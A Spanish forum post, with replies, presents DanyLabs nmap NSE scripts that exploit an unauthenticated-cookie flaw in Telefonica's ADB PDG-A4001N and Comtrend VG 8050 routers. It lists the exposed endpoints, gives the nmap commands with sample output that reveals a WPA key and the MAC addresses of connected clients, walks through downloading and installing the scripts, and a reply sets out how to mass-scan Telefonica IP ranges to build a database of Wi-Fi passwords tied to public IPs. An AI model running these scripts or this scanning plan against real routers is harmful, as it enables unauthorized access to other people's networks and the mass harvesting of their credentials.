Explotando brecha de seguridad en dos routers de telefonica

[h]Presentación de dos scripts *.nse (para nmap) de DanyLabs contra dos modelos de routers puestos en servicio por Telefonica :
1) El PDG-A4001N de ADB-Broadband
2) El VG 8050 de Comtrend[/h]

https://www.wifi-libre.com/img/members/3/Timo_1.jpg

¿Que tal hoy amig@ wifi-libertari@?
Ayer hemos hablado de una brecha muy interesante en los routers vodafone para fibra ( Brecha severa en los nuevos routers “fibra” Vodafone (Huawei HG253 v2) )
Podemos explotar esta brecha ( créditos vicendominguez) gracias a un script ( http-enum-vodafone-hua253s.nse )de DanyLab disponible en su rama GitHub
Si os fijéis podéis ver que DanyLab nos propone dos scripts más en su rama :
[list=1]
]http-enum-telefonica-homestation.nse (para PDG-A4001N de ADB-Broadband)/]
]http-enum-telefonica-comtrend-vg-8050.nse (para VG 8050 de Comtrend)/]
[/list]

Las tres brechas son muy similares : Permiten obtener sin permisos información critica, sobre todo la lave WPA de la red WiFi.
El PDG-A4001N (eSSID por defecto de tipo WLAN_XXXX) es un modelo que telefónica ha empezado a usar por 2011.
Es un dispositivo que conocemos bien ya que tiene varios PIN WPS genéricos y fue de los primeros modelos soportados por WPSPIN.
El VG 8050 (eSSID por defecto MOVISTAR_XXXX) aparece en el paisaje wifi español un poco más tarde, alrededor de 2013.
También conocido por ser fácilmente atacable con su PIN genérico
Vista de la interfaz incriminada con su PIN genérico
https://www.wifi-libre.com/img/members/3/timo_2.jpg

En los tres dispositivos la vulnerabilidad se situá al nivel de la gestión del certificado de autenticidad de los coockies.
Podemos acceder a algunas paginas de configuración del router gracias a coockies no autenticados y sin tener los credenciales.

En el PDG-A4001N podemos así acceder a :

[quote]http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx[/quote]

Usando el script de DanyLab podremos conseguir fácilmente la información siguiente :

[code]nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-homestation:
| SSID: WLAN_HOME
| Cipher Algorithm: WEP
| Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X
[/code]

Con el VG 8050 podemos acceder a las mimas paginas…

[quote]http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx[/quote]

Y podremos usar el script de DanyLab para obtener el bSSID, el eSSID, la llave WPA (y hasta la mac de los clientes conectados a la red WiFI)

[code]nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-comtrend-vg-8050:
| SSID: MOVISTAR_XXX
| Cipher Algorithm: WPA
| Password WEP:
| Password WPA: gTU3NkXE44RYjuM2RrxM
| Password WPA2:
| Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X[/code]

[h]Como usar un script *.nse (Nmap Scripting Engine)[/h]

Nuestro nmap es una herramienta fabulosa. Una de sus fuerzas es la posibilidad de crear y lanzar scripts con nuestros comandos nmap.
Estos script se distinguen por su extensión de tipo *.nse
Vamos a ver como hacemos para usar uno de estos scripts.
Lo primero que tenemos que hacer es localizar el directorio dónde nmap guarda los scripts ***.nse **(nmap lleva muchos de estos scripts por defecto que son muy interesantes)

locate *.nse

En mi caso es en /usr/local/share/nmap/scripts/
Luego simplemente copiamos el script que queremos añadir en este directorio

Ejemplo (script comtrend) :
Descargamos los scripts de Dany

svn co https://github.com/DaniLabs/scripts-nse

Copiamos el script (comtrend) en el directorio

sudo cp -r  scripts-nse/trunk/http-enum-telefonica-comtrend-vg-8050.nse  /usr/local/share/nmap/scripts

A la hora de redactar nuestra linea de comando nmap invocamos el script con el parámetro “–script=”
Por ejemplo; para ver la ayuda sobre el script : sudo nmap --script-help http-enum-telefonica-comtrend-vg-8050.nse
Y obtenemos información sobre el script :

[code]Starting Nmap 7.00 ( https://nmap.org ) at 2015-11-28 13:56 CET

http-enum-telefonica-comtrend-vg-8050
Categories: default safe
https://nmap.org/nsedoc/scripts/http-enum-telefonica-comtrend-vg-8050.html
Script to detect disclosure information vulnerability from Comtrend VG 8050 Telefonica Spain[/code]

Fácil ¿No?
Una vez que habéis copiado el script en el directorio nmap dedicado podéis usar los comandos dados por DanyLab,
¡Buena pesca! :lol:

Tiene buena pinta, aunque no acabo de entender cuales son los pasos para realizar el ataque. Estaría bien algún video ilustrativo de esos que sabes hacer

Buenas Atim.
Desgraciadamente no tengo ninguno de estos routers para hacer un vídeo o un tema guapo con imágenes de un ataque.
Suponiendo que tienes uno, lo que tendrías que hacer es
[list=1]
]Notar la IP publica./]
]Lanzas el comando nmap sobre la IP publica del punto de acceso y invocando el script/]
]El script se encarga de crear el coockie y de recoger gracias a el la información disponible en las paginas/]
[/list]

Si nos ponemos en la piel de un “chico malote”, lo que haría sería
[list=1]
]lanzar un primer escaneo básico sobre puertos 80 y 443 en rangos de IP que pertenecen a telefónica/]
]Lanzar el script contra las IP recogidas en el primer escaneo/]
[/list]

Y nada… se hace asi una base de datos con nombre de la red, bSSID y passWPA + IP.
Si usas uno de estos routers, pues no mola saber que uno puede conocer el pass de tu red wifi y localizarla con su IP publica.
No es la cosa mas peligrosa del mundo porque tiene que mover su culo hasta tu casa para explotar la brecha y perjudicarte (mas allá del hecho de que conoce tu pass)
Es un mal menor : el “exploit” se focaliza en obtener información.
No sabemos si no se podría acceder y/o configurar otras paginas de un modo similar…Para hacer cosas mas malignas como habilitar SSH para tomar el control remotamente…

Muchas gracias por la explicación kcdtv.